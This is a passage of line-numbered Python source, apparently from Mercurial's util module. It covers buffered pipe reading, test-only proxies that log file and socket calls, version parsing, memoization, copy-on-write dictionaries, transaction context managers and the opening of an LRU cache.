328 328 return self._frombuffer(size)
329 329
330 330 def unbufferedread(self, size):
331 331 if not self._eof and self._lenbuf == 0:
332 332 self._fillbuffer(max(size, _chunksize))
333 333 return self._frombuffer(min(self._lenbuf, size))
334 334
335 335 def readline(self, *args, **kwargs):
336 336 if len(self._buffer) > 1:
337 337 # this should not happen because both read and readline end with a
338 338 # _frombuffer call that collapses it.
339 339 self._buffer = [''.join(self._buffer)]
340 340 self._lenbuf = len(self._buffer[0])
341 341 lfi = -1
342 342 if self._buffer:
343 343 lfi = self._buffer[-1].find('\n')
344 344 while (not self._eof) and lfi < 0:
345 345 self._fillbuffer()
346 346 if self._buffer:
347 347 lfi = self._buffer[-1].find('\n')
348 348 size = lfi + 1
349 349 if lfi < 0: # end of file
350 350 size = self._lenbuf
351 351 elif len(self._buffer) > 1:
352 352 # we need to take previous chunks into account
353 353 size += self._lenbuf - len(self._buffer[-1])
354 354 return self._frombuffer(size)
355 355
356 356 def _frombuffer(self, size):
357 357 """return at most 'size' data from the buffer
358 358
359 359 The data are removed from the buffer."""
360 360 if size == 0 or not self._buffer:
361 361 return ''
362 362 buf = self._buffer[0]
363 363 if len(self._buffer) > 1:
364 364 buf = ''.join(self._buffer)
365 365
366 366 data = buf[:size]
367 367 buf = buf[len(data):]
368 368 if buf:
369 369 self._buffer = [buf]
370 370 self._lenbuf = len(buf)
371 371 else:
372 372 self._buffer = []
373 373 self._lenbuf = 0
374 374 return data
375 375
376 376 def _fillbuffer(self, size=_chunksize):
377 377 """read data to the buffer"""
378 378 data = os.read(self._input.fileno(), size)
379 379 if not data:
380 380 self._eof = True
381 381 else:
382 382 self._lenbuf += len(data)
383 383 self._buffer.append(data)
384 384
385 385 return data
386 386
387 387 def mmapread(fp):
388 388 try:
389 389 fd = getattr(fp, 'fileno', lambda: fp)()
390 390 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
391 391 except ValueError:
392 392 # Empty files cannot be mmapped, but mmapread should still work. Check
393 393 # if the file is empty, and if so, return an empty buffer.
394 394 if os.fstat(fd).st_size == 0:
395 395 return ''
396 396 raise
397 397
398 398 class fileobjectproxy(object):
399 399 """A proxy around file objects that tells a watcher when events occur.
400 400
401 401 This type is intended to only be used for testing purposes. Think hard
402 402 before using it in important code.
403 403 """
404 404 __slots__ = (
405 405 r'_orig',
406 406 r'_observer',
407 407 )
408 408
409 409 def __init__(self, fh, observer):
410 410 object.__setattr__(self, r'_orig', fh)
411 411 object.__setattr__(self, r'_observer', observer)
412 412
413 413 def __getattribute__(self, name):
414 414 ours = {
415 415 r'_observer',
416 416
417 417 # IOBase
418 418 r'close',
419 419 # closed is a property
420 420 r'fileno',
421 421 r'flush',
422 422 r'isatty',
423 423 r'readable',
424 424 r'readline',
425 425 r'readlines',
426 426 r'seek',
427 427 r'seekable',
428 428 r'tell',
429 429 r'truncate',
430 430 r'writable',
431 431 r'writelines',
432 432 # RawIOBase
433 433 r'read',
434 434 r'readall',
435 435 r'readinto',
436 436 r'write',
437 437 # BufferedIOBase
438 438 # raw is a property
439 439 r'detach',
440 440 # read defined above
441 441 r'read1',
442 442 # readinto defined above
443 443 # write defined above
444 444 }
445 445
446 446 # We only observe some methods.
447 447 if name in ours:
448 448 return object.__getattribute__(self, name)
449 449
450 450 return getattr(object.__getattribute__(self, r'_orig'), name)
451 451
452 452 def __nonzero__(self):
453 453 return bool(object.__getattribute__(self, r'_orig'))
454 454
455 455 __bool__ = __nonzero__
456 456
457 457 def __delattr__(self, name):
458 458 return delattr(object.__getattribute__(self, r'_orig'), name)
459 459
460 460 def __setattr__(self, name, value):
461 461 return setattr(object.__getattribute__(self, r'_orig'), name, value)
462 462
463 463 def __iter__(self):
464 464 return object.__getattribute__(self, r'_orig').__iter__()
465 465
466 466 def _observedcall(self, name, *args, **kwargs):
467 467 # Call the original object.
468 468 orig = object.__getattribute__(self, r'_orig')
469 469 res = getattr(orig, name)(*args, **kwargs)
470 470
471 471 # Call a method on the observer of the same name with arguments
472 472 # so it can react, log, etc.
473 473 observer = object.__getattribute__(self, r'_observer')
474 474 fn = getattr(observer, name, None)
475 475 if fn:
476 476 fn(res, *args, **kwargs)
477 477
478 478 return res
479 479
480 480 def close(self, *args, **kwargs):
481 481 return object.__getattribute__(self, r'_observedcall')(
482 482 r'close', *args, **kwargs)
483 483
484 484 def fileno(self, *args, **kwargs):
485 485 return object.__getattribute__(self, r'_observedcall')(
486 486 r'fileno', *args, **kwargs)
487 487
488 488 def flush(self, *args, **kwargs):
489 489 return object.__getattribute__(self, r'_observedcall')(
490 490 r'flush', *args, **kwargs)
491 491
492 492 def isatty(self, *args, **kwargs):
493 493 return object.__getattribute__(self, r'_observedcall')(
494 494 r'isatty', *args, **kwargs)
495 495
496 496 def readable(self, *args, **kwargs):
497 497 return object.__getattribute__(self, r'_observedcall')(
498 498 r'readable', *args, **kwargs)
499 499
500 500 def readline(self, *args, **kwargs):
501 501 return object.__getattribute__(self, r'_observedcall')(
502 502 r'readline', *args, **kwargs)
503 503
504 504 def readlines(self, *args, **kwargs):
505 505 return object.__getattribute__(self, r'_observedcall')(
506 506 r'readlines', *args, **kwargs)
507 507
508 508 def seek(self, *args, **kwargs):
509 509 return object.__getattribute__(self, r'_observedcall')(
510 510 r'seek', *args, **kwargs)
511 511
512 512 def seekable(self, *args, **kwargs):
513 513 return object.__getattribute__(self, r'_observedcall')(
514 514 r'seekable', *args, **kwargs)
515 515
516 516 def tell(self, *args, **kwargs):
517 517 return object.__getattribute__(self, r'_observedcall')(
518 518 r'tell', *args, **kwargs)
519 519
520 520 def truncate(self, *args, **kwargs):
521 521 return object.__getattribute__(self, r'_observedcall')(
522 522 r'truncate', *args, **kwargs)
523 523
524 524 def writable(self, *args, **kwargs):
525 525 return object.__getattribute__(self, r'_observedcall')(
526 526 r'writable', *args, **kwargs)
527 527
528 528 def writelines(self, *args, **kwargs):
529 529 return object.__getattribute__(self, r'_observedcall')(
530 530 r'writelines', *args, **kwargs)
531 531
532 532 def read(self, *args, **kwargs):
533 533 return object.__getattribute__(self, r'_observedcall')(
534 534 r'read', *args, **kwargs)
535 535
536 536 def readall(self, *args, **kwargs):
537 537 return object.__getattribute__(self, r'_observedcall')(
538 538 r'readall', *args, **kwargs)
539 539
540 540 def readinto(self, *args, **kwargs):
541 541 return object.__getattribute__(self, r'_observedcall')(
542 542 r'readinto', *args, **kwargs)
543 543
544 544 def write(self, *args, **kwargs):
545 545 return object.__getattribute__(self, r'_observedcall')(
546 546 r'write', *args, **kwargs)
547 547
548 548 def detach(self, *args, **kwargs):
549 549 return object.__getattribute__(self, r'_observedcall')(
550 550 r'detach', *args, **kwargs)
551 551
552 552 def read1(self, *args, **kwargs):
553 553 return object.__getattribute__(self, r'_observedcall')(
554 554 r'read1', *args, **kwargs)
555 555
556 556 class observedbufferedinputpipe(bufferedinputpipe):
557 557 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
558 558
559 559 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
560 560 bypass ``fileobjectproxy``. Because of this, we need to make
561 561 ``bufferedinputpipe`` aware of these operations.
562 562
563 563 This variation of ``bufferedinputpipe`` can notify observers about
564 564 ``os.read()`` events. It also re-publishes other events, such as
565 565 ``read()`` and ``readline()``.
566 566 """
567 567 def _fillbuffer(self):
568 568 res = super(observedbufferedinputpipe, self)._fillbuffer()
569 569
570 570 fn = getattr(self._input._observer, r'osread', None)
571 571 if fn:
572 572 fn(res, _chunksize)
573 573
574 574 return res
575 575
576 576 # We use different observer methods because the operation isn't
577 577 # performed on the actual file object but on us.
578 578 def read(self, size):
579 579 res = super(observedbufferedinputpipe, self).read(size)
580 580
581 581 fn = getattr(self._input._observer, r'bufferedread', None)
582 582 if fn:
583 583 fn(res, size)
584 584
585 585 return res
586 586
587 587 def readline(self, *args, **kwargs):
588 588 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
589 589
590 590 fn = getattr(self._input._observer, r'bufferedreadline', None)
591 591 if fn:
592 592 fn(res)
593 593
594 594 return res
595 595
596 596 PROXIED_SOCKET_METHODS = {
597 597 r'makefile',
598 598 r'recv',
599 599 r'recvfrom',
600 600 r'recvfrom_into',
601 601 r'recv_into',
602 602 r'send',
603 603 r'sendall',
604 604 r'sendto',
605 605 r'setblocking',
606 606 r'settimeout',
607 607 r'gettimeout',
608 608 r'setsockopt',
609 609 }
610 610
611 611 class socketproxy(object):
612 612 """A proxy around a socket that tells a watcher when events occur.
613 613
614 614 This is like ``fileobjectproxy`` except for sockets.
615 615
616 616 This type is intended to only be used for testing purposes. Think hard
617 617 before using it in important code.
618 618 """
619 619 __slots__ = (
620 620 r'_orig',
621 621 r'_observer',
622 622 )
623 623
624 624 def __init__(self, sock, observer):
625 625 object.__setattr__(self, r'_orig', sock)
626 626 object.__setattr__(self, r'_observer', observer)
627 627
628 628 def __getattribute__(self, name):
629 629 if name in PROXIED_SOCKET_METHODS:
630 630 return object.__getattribute__(self, name)
631 631
632 632 return getattr(object.__getattribute__(self, r'_orig'), name)
633 633
634 634 def __delattr__(self, name):
635 635 return delattr(object.__getattribute__(self, r'_orig'), name)
636 636
637 637 def __setattr__(self, name, value):
638 638 return setattr(object.__getattribute__(self, r'_orig'), name, value)
639 639
640 640 def __nonzero__(self):
641 641 return bool(object.__getattribute__(self, r'_orig'))
642 642
643 643 __bool__ = __nonzero__
644 644
645 645 def _observedcall(self, name, *args, **kwargs):
646 646 # Call the original object.
647 647 orig = object.__getattribute__(self, r'_orig')
648 648 res = getattr(orig, name)(*args, **kwargs)
649 649
650 650 # Call a method on the observer of the same name with arguments
651 651 # so it can react, log, etc.
652 652 observer = object.__getattribute__(self, r'_observer')
653 653 fn = getattr(observer, name, None)
654 654 if fn:
655 655 fn(res, *args, **kwargs)
656 656
657 657 return res
658 658
659 659 def makefile(self, *args, **kwargs):
660 660 res = object.__getattribute__(self, r'_observedcall')(
661 661 r'makefile', *args, **kwargs)
662 662
663 663 # The file object may be used for I/O. So we turn it into a
664 664 # proxy using our observer.
665 665 observer = object.__getattribute__(self, r'_observer')
666 666 return makeloggingfileobject(observer.fh, res, observer.name,
667 667 reads=observer.reads,
668 668 writes=observer.writes,
669 669 logdata=observer.logdata,
670 670 logdataapis=observer.logdataapis)
671 671
672 672 def recv(self, *args, **kwargs):
673 673 return object.__getattribute__(self, r'_observedcall')(
674 674 r'recv', *args, **kwargs)
675 675
676 676 def recvfrom(self, *args, **kwargs):
677 677 return object.__getattribute__(self, r'_observedcall')(
678 678 r'recvfrom', *args, **kwargs)
679 679
680 680 def recvfrom_into(self, *args, **kwargs):
681 681 return object.__getattribute__(self, r'_observedcall')(
682 682 r'recvfrom_into', *args, **kwargs)
683 683
684 684 def recv_into(self, *args, **kwargs):
685 685 return object.__getattribute__(self, r'_observedcall')(
686 686 r'recv_into', *args, **kwargs)
687 687
688 688 def send(self, *args, **kwargs):
689 689 return object.__getattribute__(self, r'_observedcall')(
690 690 r'send', *args, **kwargs)
691 691
692 692 def sendall(self, *args, **kwargs):
693 693 return object.__getattribute__(self, r'_observedcall')(
694 694 r'sendall', *args, **kwargs)
695 695
696 696 def sendto(self, *args, **kwargs):
697 697 return object.__getattribute__(self, r'_observedcall')(
698 698 r'sendto', *args, **kwargs)
699 699
700 700 def setblocking(self, *args, **kwargs):
701 701 return object.__getattribute__(self, r'_observedcall')(
702 702 r'setblocking', *args, **kwargs)
703 703
704 704 def settimeout(self, *args, **kwargs):
705 705 return object.__getattribute__(self, r'_observedcall')(
706 706 r'settimeout', *args, **kwargs)
707 707
708 708 def gettimeout(self, *args, **kwargs):
709 709 return object.__getattribute__(self, r'_observedcall')(
710 710 r'gettimeout', *args, **kwargs)
711 711
712 712 def setsockopt(self, *args, **kwargs):
713 713 return object.__getattribute__(self, r'_observedcall')(
714 714 r'setsockopt', *args, **kwargs)
715 715
716 716 class baseproxyobserver(object):
717 717 def _writedata(self, data):
718 718 if not self.logdata:
719 719 if self.logdataapis:
720 720 self.fh.write('\n')
721 721 self.fh.flush()
722 722 return
723 723
724 724 # Simple case writes all data on a single line.
725 725 if b'\n' not in data:
726 726 if self.logdataapis:
727 727 self.fh.write(': %s\n' % stringutil.escapestr(data))
728 728 else:
729 729 self.fh.write('%s> %s\n'
730 730 % (self.name, stringutil.escapestr(data)))
731 731 self.fh.flush()
732 732 return
733 733
734 734 # Data with newlines is written to multiple lines.
735 735 if self.logdataapis:
736 736 self.fh.write(':\n')
737 737
738 738 lines = data.splitlines(True)
739 739 for line in lines:
740 740 self.fh.write('%s> %s\n'
741 741 % (self.name, stringutil.escapestr(line)))
742 742 self.fh.flush()
743 743
744 744 class fileobjectobserver(baseproxyobserver):
745 745 """Logs file object activity."""
746 746 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
747 747 logdataapis=True):
748 748 self.fh = fh
749 749 self.name = name
750 750 self.logdata = logdata
751 751 self.logdataapis = logdataapis
752 752 self.reads = reads
753 753 self.writes = writes
754 754
755 755 def read(self, res, size=-1):
756 756 if not self.reads:
757 757 return
758 758 # Python 3 can return None from reads at EOF instead of empty strings.
759 759 if res is None:
760 760 res = ''
761 761
762 762 if size == -1 and res == '':
763 763 # Suppress pointless read(-1) calls that return
764 764 # nothing. These happen _a lot_ on Python 3, and there
765 765 # doesn't seem to be a better workaround to have matching
766 766 # Python 2 and 3 behavior. :(
767 767 return
768 768
769 769 if self.logdataapis:
770 770 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
771 771
772 772 self._writedata(res)
773 773
774 774 def readline(self, res, limit=-1):
775 775 if not self.reads:
776 776 return
777 777
778 778 if self.logdataapis:
779 779 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
780 780
781 781 self._writedata(res)
782 782
783 783 def readinto(self, res, dest):
784 784 if not self.reads:
785 785 return
786 786
787 787 if self.logdataapis:
788 788 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
789 789 res))
790 790
791 791 data = dest[0:res] if res is not None else b''
792 792
793 793 # _writedata() uses "in" operator and is confused by memoryview because
794 794 # characters are ints on Python 3.
795 795 if isinstance(data, memoryview):
796 796 data = data.tobytes()
797 797
798 798 self._writedata(data)
799 799
800 800 def write(self, res, data):
801 801 if not self.writes:
802 802 return
803 803
804 804 # Python 2 returns None from some write() calls. Python 3 (reasonably)
805 805 # returns the integer bytes written.
806 806 if res is None and data:
807 807 res = len(data)
808 808
809 809 if self.logdataapis:
810 810 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
811 811
812 812 self._writedata(data)
813 813
814 814 def flush(self, res):
815 815 if not self.writes:
816 816 return
817 817
818 818 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
819 819
820 820 # For observedbufferedinputpipe.
821 821 def bufferedread(self, res, size):
822 822 if not self.reads:
823 823 return
824 824
825 825 if self.logdataapis:
826 826 self.fh.write('%s> bufferedread(%d) -> %d' % (
827 827 self.name, size, len(res)))
828 828
829 829 self._writedata(res)
830 830
831 831 def bufferedreadline(self, res):
832 832 if not self.reads:
833 833 return
834 834
835 835 if self.logdataapis:
836 836 self.fh.write('%s> bufferedreadline() -> %d' % (
837 837 self.name, len(res)))
838 838
839 839 self._writedata(res)
840 840
841 841 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
842 842 logdata=False, logdataapis=True):
843 843 """Turn a file object into a logging file object."""
844 844
845 845 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
846 846 logdata=logdata, logdataapis=logdataapis)
847 847 return fileobjectproxy(fh, observer)
848 848
849 849 class socketobserver(baseproxyobserver):
850 850 """Logs socket activity."""
851 851 def __init__(self, fh, name, reads=True, writes=True, states=True,
852 852 logdata=False, logdataapis=True):
853 853 self.fh = fh
854 854 self.name = name
855 855 self.reads = reads
856 856 self.writes = writes
857 857 self.states = states
858 858 self.logdata = logdata
859 859 self.logdataapis = logdataapis
860 860
861 861 def makefile(self, res, mode=None, bufsize=None):
862 862 if not self.states:
863 863 return
864 864
865 865 self.fh.write('%s> makefile(%r, %r)\n' % (
866 866 self.name, mode, bufsize))
867 867
868 868 def recv(self, res, size, flags=0):
869 869 if not self.reads:
870 870 return
871 871
872 872 if self.logdataapis:
873 873 self.fh.write('%s> recv(%d, %d) -> %d' % (
874 874 self.name, size, flags, len(res)))
875 875 self._writedata(res)
876 876
877 877 def recvfrom(self, res, size, flags=0):
878 878 if not self.reads:
879 879 return
880 880
881 881 if self.logdataapis:
882 882 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
883 883 self.name, size, flags, len(res[0])))
884 884
885 885 self._writedata(res[0])
886 886
887 887 def recvfrom_into(self, res, buf, size, flags=0):
888 888 if not self.reads:
889 889 return
890 890
891 891 if self.logdataapis:
892 892 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
893 893 self.name, size, flags, res[0]))
894 894
895 895 self._writedata(buf[0:res[0]])
896 896
897 897 def recv_into(self, res, buf, size=0, flags=0):
898 898 if not self.reads:
899 899 return
900 900
901 901 if self.logdataapis:
902 902 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
903 903 self.name, size, flags, res))
904 904
905 905 self._writedata(buf[0:res])
906 906
907 907 def send(self, res, data, flags=0):
908 908 if not self.writes:
909 909 return
910 910
911 911 self.fh.write('%s> send(%d, %d) -> %d' % (
912 912 self.name, len(data), flags, len(res)))
913 913 self._writedata(data)
914 914
915 915 def sendall(self, res, data, flags=0):
916 916 if not self.writes:
917 917 return
918 918
919 919 if self.logdataapis:
920 920 # Returns None on success. So don't bother reporting return value.
921 921 self.fh.write('%s> sendall(%d, %d)' % (
922 922 self.name, len(data), flags))
923 923
924 924 self._writedata(data)
925 925
926 926 def sendto(self, res, data, flagsoraddress, address=None):
927 927 if not self.writes:
928 928 return
929 929
930 930 if address:
931 931 flags = flagsoraddress
932 932 else:
933 933 flags = 0
934 934
935 935 if self.logdataapis:
936 936 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
937 937 self.name, len(data), flags, address, res))
938 938
939 939 self._writedata(data)
940 940
941 941 def setblocking(self, res, flag):
942 942 if not self.states:
943 943 return
944 944
945 945 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
946 946
947 947 def settimeout(self, res, value):
948 948 if not self.states:
949 949 return
950 950
951 951 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
952 952
953 953 def gettimeout(self, res):
954 954 if not self.states:
955 955 return
956 956
957 957 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
958 958
959 959 def setsockopt(self, res, level, optname, value):
960 960 if not self.states:
961 961 return
962 962
963 963 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
964 964 self.name, level, optname, value, res))
965 965
966 966 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
967 967 logdata=False, logdataapis=True):
968 968 """Turn a socket into a logging socket."""
969 969
970 970 observer = socketobserver(logh, name, reads=reads, writes=writes,
971 971 states=states, logdata=logdata,
972 972 logdataapis=logdataapis)
973 973 return socketproxy(fh, observer)
974 974
975 975 def version():
976 976 """Return version information if available."""
977 977 try:
978 978 from . import __version__
979 979 return __version__.version
980 980 except ImportError:
981 981 return 'unknown'
982 982
983 983 def versiontuple(v=None, n=4):
984 984 """Parses a Mercurial version string into an N-tuple.
985 985
986 986 The version string to be parsed is specified with the ``v`` argument.
987 987 If it isn't defined, the current Mercurial version string will be parsed.
988 988
989 989 ``n`` can be 2, 3, or 4. Here is how some version strings map to
990 990 returned values:
991 991
992 992 >>> v = b'3.6.1+190-df9b73d2d444'
993 993 >>> versiontuple(v, 2)
994 994 (3, 6)
995 995 >>> versiontuple(v, 3)
996 996 (3, 6, 1)
997 997 >>> versiontuple(v, 4)
998 998 (3, 6, 1, '190-df9b73d2d444')
999 999
1000 1000 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1001 1001 (3, 6, 1, '190-df9b73d2d444+20151118')
1002 1002
1003 1003 >>> v = b'3.6'
1004 1004 >>> versiontuple(v, 2)
1005 1005 (3, 6)
1006 1006 >>> versiontuple(v, 3)
1007 1007 (3, 6, None)
1008 1008 >>> versiontuple(v, 4)
1009 1009 (3, 6, None, None)
1010 1010
1011 1011 >>> v = b'3.9-rc'
1012 1012 >>> versiontuple(v, 2)
1013 1013 (3, 9)
1014 1014 >>> versiontuple(v, 3)
1015 1015 (3, 9, None)
1016 1016 >>> versiontuple(v, 4)
1017 1017 (3, 9, None, 'rc')
1018 1018
1019 1019 >>> v = b'3.9-rc+2-02a8fea4289b'
1020 1020 >>> versiontuple(v, 2)
1021 1021 (3, 9)
1022 1022 >>> versiontuple(v, 3)
1023 1023 (3, 9, None)
1024 1024 >>> versiontuple(v, 4)
1025 1025 (3, 9, None, 'rc+2-02a8fea4289b')
1026 1026
1027 1027 >>> versiontuple(b'4.6rc0')
1028 1028 (4, 6, None, 'rc0')
1029 1029 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1030 1030 (4, 6, None, 'rc0+12-425d55e54f98')
1031 1031 >>> versiontuple(b'.1.2.3')
1032 1032 (None, None, None, '.1.2.3')
1033 1033 >>> versiontuple(b'12.34..5')
1034 1034 (12, 34, None, '..5')
1035 1035 >>> versiontuple(b'1.2.3.4.5.6')
1036 1036 (1, 2, 3, '.4.5.6')
1037 1037 """
1038 1038 if not v:
1039 1039 v = version()
1040 1040 m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
1041 1041 if not m:
1042 1042 vparts, extra = '', v
1043 1043 elif m.group(2):
1044 1044 vparts, extra = m.groups()
1045 1045 else:
1046 1046 vparts, extra = m.group(1), None
1047 1047
1048 1048 vints = []
1049 1049 for i in vparts.split('.'):
1050 1050 try:
1051 1051 vints.append(int(i))
1052 1052 except ValueError:
1053 1053 break
1054 1054 # (3, 6) -> (3, 6, None)
1055 1055 while len(vints) < 3:
1056 1056 vints.append(None)
1057 1057
1058 1058 if n == 2:
1059 1059 return (vints[0], vints[1])
1060 1060 if n == 3:
1061 1061 return (vints[0], vints[1], vints[2])
1062 1062 if n == 4:
1063 1063 return (vints[0], vints[1], vints[2], extra)
1064 1064
1065 1065 def cachefunc(func):
1066 1066 '''cache the result of function calls'''
1067 1067 # XXX doesn't handle keyword args
1068 1068 if func.__code__.co_argcount == 0:
1069 1069 cache = []
1070 1070 def f():
1071 1071 if len(cache) == 0:
1072 1072 cache.append(func())
1073 1073 return cache[0]
1074 1074 return f
1075 1075 cache = {}
1076 1076 if func.__code__.co_argcount == 1:
1077 1077 # we gain a small amount of time because
1078 1078 # we don't need to pack/unpack the list
1079 1079 def f(arg):
1080 1080 if arg not in cache:
1081 1081 cache[arg] = func(arg)
1082 1082 return cache[arg]
1083 1083 else:
1084 1084 def f(*args):
1085 1085 if args not in cache:
1086 1086 cache[args] = func(*args)
1087 1087 return cache[args]
1088 1088
1089 1089 return f
1090 1090
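# Editor's sketch (not part of this changeset): a minimal usage example for
# cachefunc() defined just above. The function and names below are
# hypothetical and only illustrate the memoization behaviour.
def _cachefunc_example():
    calls = []
    def square(x):
        calls.append(x)
        return x * x
    cached = cachefunc(square)
    assert cached(3) == 9
    assert cached(3) == 9
    # the underlying function ran only once; the second call hit the cache
    assert calls == [3]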
1091 1091 class cow(object):
1092 1092 """helper class to make copy-on-write easier
1093 1093
1094 1094 Call preparewrite before doing any writes.
1095 1095 """
1096 1096
1097 1097 def preparewrite(self):
1098 1098 """call this before writes, return self or a copied new object"""
1099 1099 if getattr(self, '_copied', 0):
1100 1100 self._copied -= 1
1101 1101 return self.__class__(self)
1102 1102 return self
1103 1103
1104 1104 def copy(self):
1105 1105 """always do a cheap copy"""
1106 1106 self._copied = getattr(self, '_copied', 0) + 1
1107 1107 return self
1108 1108
1109 1109 class sortdict(collections.OrderedDict):
1110 1110 '''a simple sorted dictionary
1111 1111
1112 1112 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1113 1113 >>> d2 = d1.copy()
1114 1114 >>> d2
1115 1115 sortdict([('a', 0), ('b', 1)])
1116 1116 >>> d2.update([(b'a', 2)])
1117 1117 >>> list(d2.keys()) # should still be in last-set order
1118 1118 ['b', 'a']
1119 1119 '''
1120 1120
1121 1121 def __setitem__(self, key, value):
1122 1122 if key in self:
1123 1123 del self[key]
1124 1124 super(sortdict, self).__setitem__(key, value)
1125 1125
1126 1126 if pycompat.ispypy:
1127 1127 # __setitem__() isn't called as of PyPy 5.8.0
1128 1128 def update(self, src):
1129 1129 if isinstance(src, dict):
1130 1130 src = src.iteritems()
1131 1131 for k, v in src:
1132 1132 self[k] = v
1133 1133
1134 1134 class cowdict(cow, dict):
1135 1135 """copy-on-write dict
1136 1136
1137 1137 Be sure to call d = d.preparewrite() before writing to d.
1138 1138
1139 1139 >>> a = cowdict()
1140 1140 >>> a is a.preparewrite()
1141 1141 True
1142 1142 >>> b = a.copy()
1143 1143 >>> b is a
1144 1144 True
1145 1145 >>> c = b.copy()
1146 1146 >>> c is a
1147 1147 True
1148 1148 >>> a = a.preparewrite()
1149 1149 >>> b is a
1150 1150 False
1151 1151 >>> a is a.preparewrite()
1152 1152 True
1153 1153 >>> c = c.preparewrite()
1154 1154 >>> b is c
1155 1155 False
1156 1156 >>> b is b.preparewrite()
1157 1157 True
1158 1158 """
1159 1159
1160 1160 class cowsortdict(cow, sortdict):
1161 1161 """copy-on-write sortdict
1162 1162
1163 1163 Be sure to call d = d.preparewrite() before writing to d.
1164 1164 """
1165 1165
1166 1166 class transactional(object):
1167 1167 """Base class for making a transactional type into a context manager."""
1168 1168 __metaclass__ = abc.ABCMeta
1169 1169
1170 1170 @abc.abstractmethod
1171 1171 def close(self):
1172 1172 """Successfully closes the transaction."""
1173 1173
1174 1174 @abc.abstractmethod
1175 1175 def release(self):
1176 1176 """Marks the end of the transaction.
1177 1177
1178 1178 If the transaction has not been closed, it will be aborted.
1179 1179 """
1180 1180
1181 1181 def __enter__(self):
1182 1182 return self
1183 1183
1184 1184 def __exit__(self, exc_type, exc_val, exc_tb):
1185 1185 try:
1186 1186 if exc_type is None:
1187 1187 self.close()
1188 1188 finally:
1189 1189 self.release()
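
# Illustrative sketch (hypothetical subclass, not part of the original
# module): a transactional subclass only needs to provide close() and
# release(); the context-manager behaviour comes from the base class.
def _transactionalexample():
    class demotransaction(transactional):
        def close(self):
            self.committed = True
        def release(self):
            self.released = True
    t = demotransaction()
    with t:
        pass
    assert t.committed and t.released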
1190 1190
1191 1191 @contextlib.contextmanager
1192 1192 def acceptintervention(tr=None):
1193 1193 """A context manager that closes the transaction on InterventionRequired
1194 1194
1195 1195 If no transaction was provided, this simply runs the body and returns.
1196 1196 """
1197 1197 if not tr:
1198 1198 yield
1199 1199 return
1200 1200 try:
1201 1201 yield
1202 1202 tr.close()
1203 1203 except error.InterventionRequired:
1204 1204 tr.close()
1205 1205 raise
1206 1206 finally:
1207 1207 tr.release()
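
# Illustrative sketch ('tr' and 'operation' are hypothetical stand-ins for a
# started transaction and a callable that may raise InterventionRequired):
# on InterventionRequired the transaction is closed rather than aborted, so
# already-recorded work survives the interruption.
def _acceptinterventionexample(tr, operation):
    with acceptintervention(tr):
        operation()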
1208 1208
1209 1209 @contextlib.contextmanager
1210 1210 def nullcontextmanager():
1211 1211 yield
1212 1212
1213 1213 class _lrucachenode(object):
1214 1214 """A node in a doubly linked list.
1215 1215
1216 1216 Holds a reference to nodes on either side as well as a key-value
1217 1217 pair for the dictionary entry.
1218 1218 """
1219 1219 __slots__ = (r'next', r'prev', r'key', r'value', r'cost')
1220 1220
1221 1221 def __init__(self):
1222 1222 self.next = None
1223 1223 self.prev = None
1224 1224
1225 1225 self.key = _notset
1226 1226 self.value = None
1227 1227 self.cost = 0
1228 1228
1229 1229 def markempty(self):
1230 1230 """Mark the node as emptied."""
1231 1231 self.key = _notset
1232 1232 self.value = None
1233 1233 self.cost = 0
1234 1234
1235 1235 class lrucachedict(object):
1236 1236 """Dict that caches most recent accesses and sets.
1237 1237
1238 1238 The dict consists of an actual backing dict - indexed by original
1239 1239 key - and a doubly linked circular list defining the order of entries in
1240 1240 the cache.
1241 1241
1242 1242 The head node is the newest entry in the cache. If the cache is full,
1243 1243 we recycle head.prev and make it the new head. Cache accesses result in
1244 1244 the node being moved to before the existing head and being marked as the
1245 1245 new head node.
1246 1246
1247 1247 Items in the cache can be inserted with an optional "cost" value. This is
1248 1248 simply an integer that is specified by the caller. The cache can be queried
1249 1249 for the total cost of all items presently in the cache.
1250 1250
1251 1251 The cache can also define a maximum cost. If a cache insertion would
1252 1252 cause the total cost of the cache to go beyond the maximum cost limit,
1253 1253 nodes will be evicted to make room for the new node. This can be used
1254 1254 to e.g. set a max memory limit and associate an estimated bytes size
1255 1255 cost to each item in the cache. By default, no maximum cost is enforced.
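
Example of capacity-based eviction (illustrative):

>>> d = lrucachedict(2)
>>> d.insert(b'a', b'va')
>>> d.insert(b'b', b'vb')
>>> d.insert(b'c', b'vc')
>>> len(d)
2
>>> b'a' in d
False
>>> b'c' in d
True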
1256 1256 """
1257 1257 def __init__(self, max, maxcost=0):
1258 1258 self._cache = {}
1259 1259
1260 1260 self._head = head = _lrucachenode()
1261 1261 head.prev = head
1262 1262 head.next = head
1263 1263 self._size = 1
1264 1264 self.capacity = max
1265 1265 self.totalcost = 0
1266 1266 self.maxcost = maxcost
1267 1267
1268 1268 def __len__(self):
1269 1269 return len(self._cache)
1270 1270
1271 1271 def __contains__(self, k):
1272 1272 return k in self._cache
1273 1273
1274 1274 def __iter__(self):
1275 1275 # We don't have to iterate in cache order, but why not.
1276 1276 n = self._head
1277 1277 for i in range(len(self._cache)):
1278 1278 yield n.key
1279 1279 n = n.next
1280 1280
1281 1281 def __getitem__(self, k):
1282 1282 node = self._cache[k]
